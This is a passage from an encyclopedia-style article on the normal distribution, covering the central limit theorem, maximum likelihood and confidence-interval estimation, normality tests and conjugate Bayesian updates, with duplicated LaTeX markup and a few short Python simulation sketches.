_{0}}⁠,⁠λ1{\displaystyle \lambda _{1}}⁠, and⁠λ2{\displaystyle \lambda _{2}}⁠are chosen so thatf(x)=12πσ2e−(x−μ)22σ2.{\displaystyle f(x)={\frac {1}{\sqrt {2\pi \sigma ^{2}}}}e^{-{\frac {(x-\mu )^{2}}{2\sigma ^{2}}}}\,.}The entropy of a normal distributionX∼N(μ,σ2){\textstyle X\sim N(\mu ,\sigma ^{2})}is equal toH(X)=12(1+ln⁡2σ2π),{\displaystyle H(X)={\tfrac {1}{2}}(1+\ln 2\sigma ^{2}\pi )\,,}which is independent of the mean⁠μ{\displaystyle \mu }⁠. The central limit theorem states that under certain (fairly common) conditions, the sum of many random variables will have an approximately normal distribution. More specifically, whereX1,…,Xn{\textstyle X_{1},\ldots ,X_{n}}areindependent and identically distributedrandom variables with the same arbitrary distribution, zero mean, and varianceσ2{\textstyle \sigma ^{2}}and⁠Z{\displaystyle Z}⁠is their mean scaled byn{\textstyle {\sqrt {n}}}Z=n(1n∑i=1nXi){\displaystyle Z={\sqrt {n}}\left({\frac {1}{n}}\sum _{i=1}^{n}X_{i}\right)}Then, as⁠n{\displaystyle n}⁠increases, the probability distribution of⁠Z{\displaystyle Z}⁠will tend to the normal distribution with zero mean and variance⁠σ2{\displaystyle \sigma ^{2}}⁠. The theorem can be extended to variables(Xi){\textstyle (X_{i})}that are not independent and/or not identically distributed if certain constraints are placed on the degree of dependence and the moments of the distributions. Manytest statistics,scores, andestimatorsencountered in practice contain sums of certain random variables in them, and even more estimators can be represented as sums of random variables through the use ofinfluence functions. The central limit theorem implies that those statistical parameters will have asymptotically normal distributions. The central limit theorem also implies that certain distributions can be approximated by the normal distribution, for example: Whether these approximations are sufficiently accurate depends on the purpose for which they are needed, and the rate of convergence to the normal distribution. It is typically the case that such approximations are less accurate in the tails of the distribution. 
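A small simulation illustrating the statement of the central limit theorem above (a sketch only; the uniform noise source, sample sizes, and seed are arbitrary choices):

```python
import random
import statistics

random.seed(42)

def scaled_mean(n):
    """Z = sqrt(n) * (mean of n iid Uniform(-1, 1) draws); each draw has mean 0 and variance 1/3."""
    xs = [random.uniform(-1.0, 1.0) for _ in range(n)]
    return (sum(xs) / n) * n ** 0.5

# By the CLT, Z should be approximately N(0, 1/3) once n is moderately large.
samples = [scaled_mean(500) for _ in range(5000)]
print(statistics.mean(samples))      # close to 0
print(statistics.variance(samples))  # close to 1/3
within_one_sd = sum(abs(z) < (1.0 / 3.0) ** 0.5 for z in samples) / len(samples)
print(within_one_sd)                 # close to 0.68, consistent with the 68-95-99.7 rule
```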
A general upper bound for the approximation error in the central limit theorem is given by theBerry–Esseen theorem, improvements of the approximation are given by theEdgeworth expansions. This theorem can also be used to justify modeling the sum of many uniform noise sources asGaussian noise. SeeAWGN. Theprobability density,cumulative distribution, andinverse cumulative distributionof any function of one or more independent or correlated normal variables can be computed with the numerical method of ray-tracing[41](Matlab code). In the following sections we look at some special cases. If⁠X{\displaystyle X}⁠is distributed normally with mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}, then IfX1{\textstyle X_{1}}andX2{\textstyle X_{2}}are two independent standard normal random variables with mean 0 and variance 1, then Thesplit normal distributionis most directly defined in terms of joining scaled sections of the density functions of different normal distributions and rescaling the density to integrate to one. Thetruncated normal distributionresults from rescaling a section of a single density function. For any positive integern, any normal distribution with mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}is the distribution of the sum ofnindependent normal deviates, each with meanμn{\textstyle {\frac {\mu }{n}}}and varianceσ2n{\textstyle {\frac {\sigma ^{2}}{n}}}. This property is calledinfinite divisibility.[47] Conversely, ifX1{\textstyle X_{1}}andX2{\textstyle X_{2}}are independent random variables and their sumX1+X2{\textstyle X_{1}+X_{2}}has a normal distribution, then bothX1{\textstyle X_{1}}andX2{\textstyle X_{2}}must be normal deviates.[48] This result is known asCramér's decomposition theorem, and is equivalent to saying that theconvolutionof two distributions is normal if and only if both are normal. Cramér's theorem implies that a linear combination of independent non-Gaussian variables will never have an exactly normal distribution, although it may approach it arbitrarily closely.[33] TheKac–Bernstein theoremstates that ifX{\textstyle X}and⁠Y{\displaystyle Y}⁠are independent andX+Y{\textstyle X+Y}andX−Y{\textstyle X-Y}are also independent, then bothXandYmust necessarily have normal distributions.[49][50] More generally, ifX1,…,Xn{\textstyle X_{1},\ldots ,X_{n}}are independent random variables, then two distinct linear combinations∑akXk{\textstyle \sum {a_{k}X_{k}}}and∑bkXk{\textstyle \sum {b_{k}X_{k}}}will be independent if and only if allXk{\textstyle X_{k}}are normal and∑akbkσk2=0{\textstyle \sum {a_{k}b_{k}\sigma _{k}^{2}=0}}, whereσk2{\textstyle \sigma _{k}^{2}}denotes the variance ofXk{\textstyle X_{k}}.[49] The notion of normal distribution, being one of the most important distributions in probability theory, has been extended far beyond the standard framework of the univariate (that is one-dimensional) case (Case 1). All these extensions are also callednormalorGaussianlaws, so a certain ambiguity in names exists. A random variableXhas a two-piece normal distribution if it has a distribution fX(x)={N(μ,σ12),ifx≤μN(μ,σ22),ifx≥μ{\displaystyle f_{X}(x)={\begin{cases}N(\mu ,\sigma _{1}^{2}),&{\text{ if }}x\leq \mu \\N(\mu ,\sigma _{2}^{2}),&{\text{ if }}x\geq \mu \end{cases}}} whereμis the mean andσ21andσ22are the variances of the distribution to the left and right of the mean respectively. 
The meanE(X), varianceV(X), and third central momentT(X)of this distribution have been determined[51] E⁡(X)=μ+2π(σ2−σ1),V⁡(X)=(1−2π)(σ2−σ1)2+σ1σ2,T⁡(X)=2π(σ2−σ1)[(4π−1)(σ2−σ1)2+σ1σ2].{\displaystyle {\begin{aligned}\operatorname {E} (X)&=\mu +{\sqrt {\frac {2}{\pi }}}(\sigma _{2}-\sigma _{1}),\\\operatorname {V} (X)&=\left(1-{\frac {2}{\pi }}\right)(\sigma _{2}-\sigma _{1})^{2}+\sigma _{1}\sigma _{2},\\\operatorname {T} (X)&={\sqrt {\frac {2}{\pi }}}(\sigma _{2}-\sigma _{1})\left[\left({\frac {4}{\pi }}-1\right)(\sigma _{2}-\sigma _{1})^{2}+\sigma _{1}\sigma _{2}\right].\end{aligned}}} One of the main practical uses of the Gaussian law is to model the empirical distributions of many different random variables encountered in practice. In such case a possible extension would be a richer family of distributions, having more than two parameters and therefore being able to fit the empirical distribution more accurately. The examples of such extensions are: It is often the case that we do not know the parameters of the normal distribution, but instead want toestimatethem. That is, having a sample(x1,…,xn){\textstyle (x_{1},\ldots ,x_{n})}from a normalN(μ,σ2){\textstyle {\mathcal {N}}(\mu ,\sigma ^{2})}population we would like to learn the approximate values of parameters⁠μ{\displaystyle \mu }⁠andσ2{\textstyle \sigma ^{2}}. The standard approach to this problem is themaximum likelihoodmethod, which requires maximization of thelog-likelihood function:ln⁡L(μ,σ2)=∑i=1nln⁡f(xi∣μ,σ2)=−n2ln⁡(2π)−n2ln⁡σ2−12σ2∑i=1n(xi−μ)2.{\displaystyle \ln {\mathcal {L}}(\mu ,\sigma ^{2})=\sum _{i=1}^{n}\ln f(x_{i}\mid \mu ,\sigma ^{2})=-{\frac {n}{2}}\ln(2\pi )-{\frac {n}{2}}\ln \sigma ^{2}-{\frac {1}{2\sigma ^{2}}}\sum _{i=1}^{n}(x_{i}-\mu )^{2}.}Taking derivatives with respect to⁠μ{\displaystyle \mu }⁠andσ2{\textstyle \sigma ^{2}}and solving the resulting system of first order conditions yields themaximum likelihood estimates:μ^=x¯≡1n∑i=1nxi,σ^2=1n∑i=1n(xi−x¯)2.{\displaystyle {\hat {\mu }}={\overline {x}}\equiv {\frac {1}{n}}\sum _{i=1}^{n}x_{i},\qquad {\hat {\sigma }}^{2}={\frac {1}{n}}\sum _{i=1}^{n}(x_{i}-{\overline {x}})^{2}.} Thenln⁡L(μ^,σ^2){\textstyle \ln {\mathcal {L}}({\hat {\mu }},{\hat {\sigma }}^{2})}is as follows: ln⁡L(μ^,σ^2)=(−n/2)[ln⁡(2πσ^2)+1]{\displaystyle \ln {\mathcal {L}}({\hat {\mu }},{\hat {\sigma }}^{2})=(-n/2)[\ln(2\pi {\hat {\sigma }}^{2})+1]} Estimatorμ^{\displaystyle \textstyle {\hat {\mu }}}is called thesample mean, since it is the arithmetic mean of all observations. The statisticx¯{\displaystyle \textstyle {\overline {x}}}iscompleteandsufficientfor⁠μ{\displaystyle \mu }⁠, and therefore by theLehmann–Scheffé theorem,μ^{\displaystyle \textstyle {\hat {\mu }}}is theuniformly minimum variance unbiased(UMVU) estimator.[52]In finite samples it is distributed normally:μ^∼N(μ,σ2/n).{\displaystyle {\hat {\mu }}\sim {\mathcal {N}}(\mu ,\sigma ^{2}/n).}The variance of this estimator is equal to theμμ-element of the inverseFisher information matrixI−1{\displaystyle \textstyle {\mathcal {I}}^{-1}}. This implies that the estimator isfinite-sample efficient. Of practical importance is the fact that thestandard errorofμ^{\displaystyle \textstyle {\hat {\mu }}}is proportional to1/n{\displaystyle \textstyle 1/{\sqrt {n}}}, that is, if one wishes to decrease the standard error by a factor of 10, one must increase the number of points in the sample by a factor of 100. This fact is widely used in determining sample sizes for opinion polls and the number of trials inMonte Carlo simulations. 
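The maximum likelihood estimates above are straightforward to compute; a short sketch on simulated data (the true parameters and seed are arbitrary):

```python
import math
import random

random.seed(0)
mu_true, sigma_true = 5.0, 2.0
xs = [random.gauss(mu_true, sigma_true) for _ in range(100_000)]

n = len(xs)
mu_hat = sum(xs) / n                                  # sample mean
sigma2_hat = sum((x - mu_hat) ** 2 for x in xs) / n   # ML variance estimate (divides by n)

# Log-likelihood at the maximum: (-n/2) * [ln(2*pi*sigma2_hat) + 1]
log_lik = (-n / 2.0) * (math.log(2.0 * math.pi * sigma2_hat) + 1.0)

print(mu_hat, math.sqrt(sigma2_hat), log_lik)
```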
From the standpoint of theasymptotic theory,μ^{\displaystyle \textstyle {\hat {\mu }}}isconsistent, that is, itconverges in probabilityto⁠μ{\displaystyle \mu }⁠asn→∞{\textstyle n\rightarrow \infty }. The estimator is alsoasymptotically normal, which is a simple corollary of the fact that it is normal in finite samples:n(μ^−μ)→dN(0,σ2).{\displaystyle {\sqrt {n}}({\hat {\mu }}-\mu )\,\xrightarrow {d} \,{\mathcal {N}}(0,\sigma ^{2}).} The estimatorσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}is called thesample variance, since it is the variance of the sample ((x1,…,xn){\textstyle (x_{1},\ldots ,x_{n})}). In practice, another estimator is often used instead of theσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}. This other estimator is denoteds2{\textstyle s^{2}}, and is also called thesample variance, which represents a certain ambiguity in terminology; its square root⁠s{\displaystyle s}⁠is called thesample standard deviation. The estimators2{\textstyle s^{2}}differs fromσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}by having(n− 1)instead ofnin the denominator (the so-calledBessel's correction):s2=nn−1σ^2=1n−1∑i=1n(xi−x¯)2.{\displaystyle s^{2}={\frac {n}{n-1}}{\hat {\sigma }}^{2}={\frac {1}{n-1}}\sum _{i=1}^{n}(x_{i}-{\overline {x}})^{2}.}The difference betweens2{\textstyle s^{2}}andσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}becomes negligibly small for largen's. In finite samples however, the motivation behind the use ofs2{\textstyle s^{2}}is that it is anunbiased estimatorof the underlying parameterσ2{\textstyle \sigma ^{2}}, whereasσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}is biased. Also, by the Lehmann–Scheffé theorem the estimators2{\textstyle s^{2}}is uniformly minimum variance unbiased (UMVU),[52]which makes it the "best" estimator among all unbiased ones. However it can be shown that the biased estimatorσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}is better than thes2{\textstyle s^{2}}in terms of themean squared error(MSE) criterion. In finite samples boths2{\textstyle s^{2}}andσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}have scaledchi-squared distributionwith(n− 1)degrees of freedom:s2∼σ2n−1⋅χn−12,σ^2∼σ2n⋅χn−12.{\displaystyle s^{2}\sim {\frac {\sigma ^{2}}{n-1}}\cdot \chi _{n-1}^{2},\qquad {\hat {\sigma }}^{2}\sim {\frac {\sigma ^{2}}{n}}\cdot \chi _{n-1}^{2}.}The first of these expressions shows that the variance ofs2{\textstyle s^{2}}is equal to2σ4/(n−1){\textstyle 2\sigma ^{4}/(n-1)}, which is slightly greater than theσσ-element of the inverse Fisher information matrixI−1{\displaystyle \textstyle {\mathcal {I}}^{-1}}, which is2σ4/n{\textstyle 2\sigma ^{4}/n}. Thus,s2{\textstyle s^{2}}is not an efficient estimator forσ2{\textstyle \sigma ^{2}}, and moreover, sinces2{\textstyle s^{2}}is UMVU, we can conclude that the finite-sample efficient estimator forσ2{\textstyle \sigma ^{2}}does not exist. Applying the asymptotic theory, both estimatorss2{\textstyle s^{2}}andσ^2{\displaystyle \textstyle {\hat {\sigma }}^{2}}are consistent, that is they converge in probability toσ2{\textstyle \sigma ^{2}}as the sample sizen→∞{\textstyle n\rightarrow \infty }. The two estimators are also both asymptotically normal:n(σ^2−σ2)≃n(s2−σ2)→dN(0,2σ4).{\displaystyle {\sqrt {n}}({\hat {\sigma }}^{2}-\sigma ^{2})\simeq {\sqrt {n}}(s^{2}-\sigma ^{2})\,\xrightarrow {d} \,{\mathcal {N}}(0,2\sigma ^{4}).}In particular, both estimators are asymptotically efficient forσ2{\textstyle \sigma ^{2}}. 
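The effect of Bessel's correction discussed above can be seen directly by averaging both variance estimators over many small samples (a sketch; the sample size, number of trials, and true variance are arbitrary):

```python
import random

random.seed(1)
sigma2_true = 4.0
n = 5                  # small samples make the bias of the ML estimator visible
trials = 100_000

sum_biased = 0.0       # running total of sigma_hat^2 (divides by n)
sum_unbiased = 0.0     # running total of s^2 (divides by n - 1)
for _ in range(trials):
    xs = [random.gauss(0.0, sigma2_true ** 0.5) for _ in range(n)]
    xbar = sum(xs) / n
    ss = sum((x - xbar) ** 2 for x in xs)
    sum_biased += ss / n
    sum_unbiased += ss / (n - 1)

print(sum_biased / trials)    # about sigma2_true * (n - 1) / n = 3.2
print(sum_unbiased / trials)  # about sigma2_true = 4.0
```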
ByCochran's theorem, for normal distributions the sample meanμ^{\displaystyle \textstyle {\hat {\mu }}}and the sample variances2areindependent, which means there can be no gain in considering theirjoint distribution. There is also a converse theorem: if in a sample the sample mean and sample variance are independent, then the sample must have come from the normal distribution. The independence betweenμ^{\displaystyle \textstyle {\hat {\mu }}}andscan be employed to construct the so-calledt-statistic:t=μ^−μs/n=x¯−μ1n(n−1)∑(xi−x¯)2∼tn−1{\displaystyle t={\frac {{\hat {\mu }}-\mu }{s/{\sqrt {n}}}}={\frac {{\overline {x}}-\mu }{\sqrt {{\frac {1}{n(n-1)}}\sum (x_{i}-{\overline {x}})^{2}}}}\sim t_{n-1}}This quantitythas theStudent's t-distributionwith(n− 1)degrees of freedom, and it is anancillary statistic(independent of the value of the parameters). Inverting the distribution of thist-statistics will allow us to construct theconfidence intervalforμ;[53]similarly, inverting theχ2distribution of the statistics2will give us the confidence interval forσ2:[54]μ∈[μ^−tn−1,1−α/2sn,μ^+tn−1,1−α/2sn]{\displaystyle \mu \in \left[{\hat {\mu }}-t_{n-1,1-\alpha /2}{\frac {s}{\sqrt {n}}},\,{\hat {\mu }}+t_{n-1,1-\alpha /2}{\frac {s}{\sqrt {n}}}\right]}σ2∈[n−1χn−1,1−α/22s2,n−1χn−1,α/22s2]{\displaystyle \sigma ^{2}\in \left[{\frac {n-1}{\chi _{n-1,1-\alpha /2}^{2}}}s^{2},\,{\frac {n-1}{\chi _{n-1,\alpha /2}^{2}}}s^{2}\right]}wheretk,pandχ2k,pare thepthquantilesof thet- andχ2-distributions respectively. These confidence intervals are of theconfidence level1 −α, meaning that the true valuesμandσ2fall outside of these intervals with probability (orsignificance level)α. In practice people usually takeα= 5%, resulting in the 95% confidence intervals. The confidence interval forσcan be found by taking the square root of the interval bounds forσ2. Approximate formulas can be derived from the asymptotic distributions ofμ^{\displaystyle \textstyle {\hat {\mu }}}ands2:μ∈[μ^−|zα/2|ns,μ^+|zα/2|ns]{\displaystyle \mu \in \left[{\hat {\mu }}-{\frac {|z_{\alpha /2}|}{\sqrt {n}}}s,\,{\hat {\mu }}+{\frac {|z_{\alpha /2}|}{\sqrt {n}}}s\right]}σ2∈[s2−2|zα/2|ns2,s2+2|zα/2|ns2]{\displaystyle \sigma ^{2}\in \left[s^{2}-{\sqrt {2}}{\frac {|z_{\alpha /2}|}{\sqrt {n}}}s^{2},\,s^{2}+{\sqrt {2}}{\frac {|z_{\alpha /2}|}{\sqrt {n}}}s^{2}\right]}The approximate formulas become valid for large values ofn, and are more convenient for the manual calculation since the standard normal quantileszα/2do not depend onn. In particular, the most popular value ofα= 5%, results in|z0.025| =1.96. Normality tests assess the likelihood that the given data set {x1, ...,xn} comes from a normal distribution. Typically thenull hypothesisH0is that the observations are distributed normally with unspecified meanμand varianceσ2, versus the alternativeHathat the distribution is arbitrary. Many tests (over 40) have been devised for this problem. The more prominent of them are outlined below: Diagnostic plotsare more intuitively appealing but subjective at the same time, as they rely on informal human judgement to accept or reject the null hypothesis. Goodness-of-fit tests: Moment-based tests: Tests based on the empirical distribution function: Bayesian analysis of normally distributed data is complicated by the many different possibilities that may be considered: The formulas for the non-linear-regression cases are summarized in theconjugate priorarticle. 
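For the large-sample (approximate) confidence intervals given just above, here is a sketch using only the standard library; statistics.NormalDist supplies the normal quantile, and the simulated data and α = 5% are arbitrary choices:

```python
import random
from statistics import NormalDist, mean

random.seed(2)
xs = [random.gauss(10.0, 3.0) for _ in range(400)]   # sample of size n = 400

n = len(xs)
mu_hat = mean(xs)
s2 = sum((x - mu_hat) ** 2 for x in xs) / (n - 1)    # s^2 with Bessel's correction
s = s2 ** 0.5

z = NormalDist().inv_cdf(0.975)   # |z_{alpha/2}| for alpha = 5%, about 1.96

mu_interval = (mu_hat - z * s / n ** 0.5, mu_hat + z * s / n ** 0.5)
var_interval = (s2 - 2 ** 0.5 * z * s2 / n ** 0.5, s2 + 2 ** 0.5 * z * s2 / n ** 0.5)

print(mu_interval)    # should contain the true mean 10.0 about 95% of the time
print(var_interval)   # should contain the true variance 9.0 about 95% of the time
```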
The following auxiliary formula is useful for simplifying theposteriorupdate equations, which otherwise become fairly tedious. a(x−y)2+b(x−z)2=(a+b)(x−ay+bza+b)2+aba+b(y−z)2{\displaystyle a(x-y)^{2}+b(x-z)^{2}=(a+b)\left(x-{\frac {ay+bz}{a+b}}\right)^{2}+{\frac {ab}{a+b}}(y-z)^{2}} This equation rewrites the sum of two quadratics inxby expanding the squares, grouping the terms inx, andcompleting the square. Note the following about the complex constant factors attached to some of the terms: A similar formula can be written for the sum of two vector quadratics: Ifx,y,zare vectors of lengthk, andAandBaresymmetric,invertible matricesof sizek×k{\textstyle k\times k}, then (y−x)′A(y−x)+(x−z)′B(x−z)=(x−c)′(A+B)(x−c)+(y−z)′(A−1+B−1)−1(y−z){\displaystyle {\begin{aligned}&(\mathbf {y} -\mathbf {x} )'\mathbf {A} (\mathbf {y} -\mathbf {x} )+(\mathbf {x} -\mathbf {z} )'\mathbf {B} (\mathbf {x} -\mathbf {z} )\\={}&(\mathbf {x} -\mathbf {c} )'(\mathbf {A} +\mathbf {B} )(\mathbf {x} -\mathbf {c} )+(\mathbf {y} -\mathbf {z} )'(\mathbf {A} ^{-1}+\mathbf {B} ^{-1})^{-1}(\mathbf {y} -\mathbf {z} )\end{aligned}}} where c=(A+B)−1(Ay+Bz){\displaystyle \mathbf {c} =(\mathbf {A} +\mathbf {B} )^{-1}(\mathbf {A} \mathbf {y} +\mathbf {B} \mathbf {z} )} The formx′Axis called aquadratic formand is ascalar:x′Ax=∑i,jaijxixj{\displaystyle \mathbf {x} '\mathbf {A} \mathbf {x} =\sum _{i,j}a_{ij}x_{i}x_{j}}In other words, it sums up all possible combinations of products of pairs of elements fromx, with a separate coefficient for each. In addition, sincexixj=xjxi{\textstyle x_{i}x_{j}=x_{j}x_{i}}, only the sumaij+aji{\textstyle a_{ij}+a_{ji}}matters for any off-diagonal elements ofA, and there is no loss of generality in assuming thatAissymmetric. Furthermore, ifAis symmetric, then the formx′Ay=y′Ax.{\textstyle \mathbf {x} '\mathbf {A} \mathbf {y} =\mathbf {y} '\mathbf {A} \mathbf {x} .} Another useful formula is as follows:∑i=1n(xi−μ)2=∑i=1n(xi−x¯)2+n(x¯−μ)2{\displaystyle \sum _{i=1}^{n}(x_{i}-\mu )^{2}=\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+n({\bar {x}}-\mu )^{2}}wherex¯=1n∑i=1nxi.{\textstyle {\bar {x}}={\frac {1}{n}}\sum _{i=1}^{n}x_{i}.} For a set ofi.i.d.normally distributed data pointsXof sizenwhere each individual pointxfollowsx∼N(μ,σ2){\textstyle x\sim {\mathcal {N}}(\mu ,\sigma ^{2})}with knownvarianceσ2, theconjugate priordistribution is also normally distributed. This can be shown more easily by rewriting the variance as theprecision, i.e. using τ = 1/σ2. Then ifx∼N(μ,1/τ){\textstyle x\sim {\mathcal {N}}(\mu ,1/\tau )}andμ∼N(μ0,1/τ0),{\textstyle \mu \sim {\mathcal {N}}(\mu _{0},1/\tau _{0}),}we proceed as follows. 
First, thelikelihood functionis (using the formula above for the sum of differences from the mean): p(X∣μ,τ)=∏i=1nτ2πexp⁡(−12τ(xi−μ)2)=(τ2π)n/2exp⁡(−12τ∑i=1n(xi−μ)2)=(τ2π)n/2exp⁡[−12τ(∑i=1n(xi−x¯)2+n(x¯−μ)2)].{\displaystyle {\begin{aligned}p(\mathbf {X} \mid \mu ,\tau )&=\prod _{i=1}^{n}{\sqrt {\frac {\tau }{2\pi }}}\exp \left(-{\frac {1}{2}}\tau (x_{i}-\mu )^{2}\right)\\&=\left({\frac {\tau }{2\pi }}\right)^{n/2}\exp \left(-{\frac {1}{2}}\tau \sum _{i=1}^{n}(x_{i}-\mu )^{2}\right)\\&=\left({\frac {\tau }{2\pi }}\right)^{n/2}\exp \left[-{\frac {1}{2}}\tau \left(\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+n({\bar {x}}-\mu )^{2}\right)\right].\end{aligned}}} Then, we proceed as follows: p(μ∣X)∝p(X∣μ)p(μ)=(τ2π)n/2exp⁡[−12τ(∑i=1n(xi−x¯)2+n(x¯−μ)2)]τ02πexp⁡(−12τ0(μ−μ0)2)∝exp⁡(−12(τ(∑i=1n(xi−x¯)2+n(x¯−μ)2)+τ0(μ−μ0)2))∝exp⁡(−12(nτ(x¯−μ)2+τ0(μ−μ0)2))=exp⁡(−12(nτ+τ0)(μ−nτx¯+τ0μ0nτ+τ0)2+nττ0nτ+τ0(x¯−μ0)2)∝exp⁡(−12(nτ+τ0)(μ−nτx¯+τ0μ0nτ+τ0)2){\displaystyle {\begin{aligned}p(\mu \mid \mathbf {X} )&\propto p(\mathbf {X} \mid \mu )p(\mu )\\&=\left({\frac {\tau }{2\pi }}\right)^{n/2}\exp \left[-{\frac {1}{2}}\tau \left(\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+n({\bar {x}}-\mu )^{2}\right)\right]{\sqrt {\frac {\tau _{0}}{2\pi }}}\exp \left(-{\frac {1}{2}}\tau _{0}(\mu -\mu _{0})^{2}\right)\\&\propto \exp \left(-{\frac {1}{2}}\left(\tau \left(\sum _{i=1}^{n}(x_{i}-{\bar {x}})^{2}+n({\bar {x}}-\mu )^{2}\right)+\tau _{0}(\mu -\mu _{0})^{2}\right)\right)\\&\propto \exp \left(-{\frac {1}{2}}\left(n\tau ({\bar {x}}-\mu )^{2}+\tau _{0}(\mu -\mu _{0})^{2}\right)\right)\\&=\exp \left(-{\frac {1}{2}}(n\tau +\tau _{0})\left(\mu -{\dfrac {n\tau {\bar {x}}+\tau _{0}\mu _{0}}{n\tau +\tau _{0}}}\right)^{2}+{\frac {n\tau \tau _{0}}{n\tau +\tau _{0}}}({\bar {x}}-\mu _{0})^{2}\right)\\&\propto \exp \left(-{\frac {1}{2}}(n\tau +\tau _{0})\left(\mu -{\dfrac {n\tau {\bar {x}}+\tau _{0}\mu _{0}}{n\tau +\tau _{0}}}\right)^{2}\right)\end{aligned}}} In the above derivation, we used the formula above for the sum of two quadratics and eliminated all constant factors not involvingμ. The result is thekernelof a normal distribution, with meannτx¯+τ0μ0nτ+τ0{\textstyle {\frac {n\tau {\bar {x}}+\tau _{0}\mu _{0}}{n\tau +\tau _{0}}}}and precisionnτ+τ0{\textstyle n\tau +\tau _{0}}, i.e. p(μ∣X)∼N(nτx¯+τ0μ0nτ+τ0,1nτ+τ0){\displaystyle p(\mu \mid \mathbf {X} )\sim {\mathcal {N}}\left({\frac {n\tau {\bar {x}}+\tau _{0}\mu _{0}}{n\tau +\tau _{0}}},{\frac {1}{n\tau +\tau _{0}}}\right)} This can be written as a set of Bayesian update equations for the posterior parameters in terms of the prior parameters: τ0′=τ0+nτμ0′=nτx¯+τ0μ0nτ+τ0x¯=1n∑i=1nxi{\displaystyle {\begin{aligned}\tau _{0}'&=\tau _{0}+n\tau \\[5pt]\mu _{0}'&={\frac {n\tau {\bar {x}}+\tau _{0}\mu _{0}}{n\tau +\tau _{0}}}\\[5pt]{\bar {x}}&={\frac {1}{n}}\sum _{i=1}^{n}x_{i}\end{aligned}}} That is, to combinendata points with total precision ofnτ(or equivalently, total variance ofn/σ2) and mean of valuesx¯{\textstyle {\bar {x}}}, derive a new total precision simply by adding the total precision of the data to the prior total precision, and form a new mean through aprecision-weighted average, i.e. aweighted averageof the data mean and the prior mean, each weighted by the associated total precision. This makes logical sense if the precision is thought of as indicating the certainty of the observations: In the distribution of the posterior mean, each of the input components is weighted by its certainty, and the certainty of this distribution is the sum of the individual certainties. 
(For the intuition of this weighting, compare the expression "the whole is (or is not) greater than the sum of its parts". In addition, consider that the knowledge of the posterior comes from a combination of the knowledge of the prior and likelihood, so it makes sense that we are more certain of it than of either of its components.)

The above formula reveals why it is more convenient to do Bayesian analysis of conjugate priors for the normal distribution in terms of the precision: the posterior precision is simply the sum of the prior and likelihood precisions, and the posterior mean is computed through a precision-weighted average, as described above. The same formulas can be written in terms of variance by reciprocating all the precisions, yielding the less elegant formulas

$$\begin{aligned}{\sigma _{0}^{2}}'&={\frac {1}{{\frac {n}{\sigma ^{2}}}+{\frac {1}{\sigma _{0}^{2}}}}}\\\mu _{0}'&={\frac {{\frac {n{\bar {x}}}{\sigma ^{2}}}+{\frac {\mu _{0}}{\sigma _{0}^{2}}}}{{\frac {n}{\sigma ^{2}}}+{\frac {1}{\sigma _{0}^{2}}}}}\\{\bar {x}}&={\frac {1}{n}}\sum _{i=1}^{n}x_{i}\end{aligned}$$

For a set of i.i.d. normally distributed data points $\mathbf{X}$ of size $n$ where each individual point $x$ follows $x\sim {\mathcal {N}}(\mu ,\sigma ^{2})$ with known mean $\mu$, the conjugate prior of the variance has an inverse gamma distribution or a scaled inverse chi-squared distribution. The two are equivalent except for having different parameterizations. Although the inverse gamma is more commonly used, we use the scaled inverse chi-squared for the sake of convenience. The prior for $\sigma^{2}$ is as follows:

$$p(\sigma ^{2}\mid \nu _{0},\sigma _{0}^{2})={\frac {(\sigma _{0}^{2}{\frac {\nu _{0}}{2}})^{\nu _{0}/2}}{\Gamma \left({\frac {\nu _{0}}{2}}\right)}}~{\frac {\exp \left[{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right]}{(\sigma ^{2})^{1+{\frac {\nu _{0}}{2}}}}}\propto {\frac {\exp \left[{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right]}{(\sigma ^{2})^{1+{\frac {\nu _{0}}{2}}}}}$$

The likelihood function from above, written in terms of the variance, is:

$$\begin{aligned}p(\mathbf {X} \mid \mu ,\sigma ^{2})&=\left({\frac {1}{2\pi \sigma ^{2}}}\right)^{n/2}\exp \left[-{\frac {1}{2\sigma ^{2}}}\sum _{i=1}^{n}(x_{i}-\mu )^{2}\right]\\&=\left({\frac {1}{2\pi \sigma ^{2}}}\right)^{n/2}\exp \left[-{\frac {S}{2\sigma ^{2}}}\right]\end{aligned}$$

where

$$S=\sum _{i=1}^{n}(x_{i}-\mu )^{2}.$$

Then:

$$\begin{aligned}p(\sigma ^{2}\mid \mathbf {X} )&\propto p(\mathbf {X} \mid \sigma ^{2})p(\sigma ^{2})\\&=\left({\frac {1}{2\pi \sigma ^{2}}}\right)^{n/2}\exp \left[-{\frac {S}{2\sigma ^{2}}}\right]{\frac {(\sigma _{0}^{2}{\frac {\nu _{0}}{2}})^{{\frac {\nu _{0}}{2}}}}{\Gamma \left({\frac {\nu _{0}}{2}}\right)}}~{\frac {\exp \left[{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right]}{(\sigma ^{2})^{1+{\frac {\nu _{0}}{2}}}}}\\&\propto \left({\frac {1}{\sigma ^{2}}}\right)^{n/2}{\frac {1}{(\sigma ^{2})^{1+{\frac {\nu _{0}}{2}}}}}\exp \left[-{\frac {S}{2\sigma ^{2}}}+{\frac {-\nu _{0}\sigma _{0}^{2}}{2\sigma ^{2}}}\right]\\&={\frac {1}{(\sigma ^{2})^{1+{\frac {\nu _{0}+n}{2}}}}}\exp \left[-{\frac {\nu _{0}\sigma _{0}^{2}+S}{2\sigma ^{2}}}\right]\end{aligned}$$

The above is also a scaled inverse chi-squared distribution where

$$\begin{aligned}\nu _{0}'&=\nu _{0}+n\\\nu _{0}'{\sigma _{0}^{2}}'&=\nu _{0}\sigma _{0}^{2}+\sum _{i=1}^{n}(x_{i}-\mu )^{2}\end{aligned}$$

or equivalently

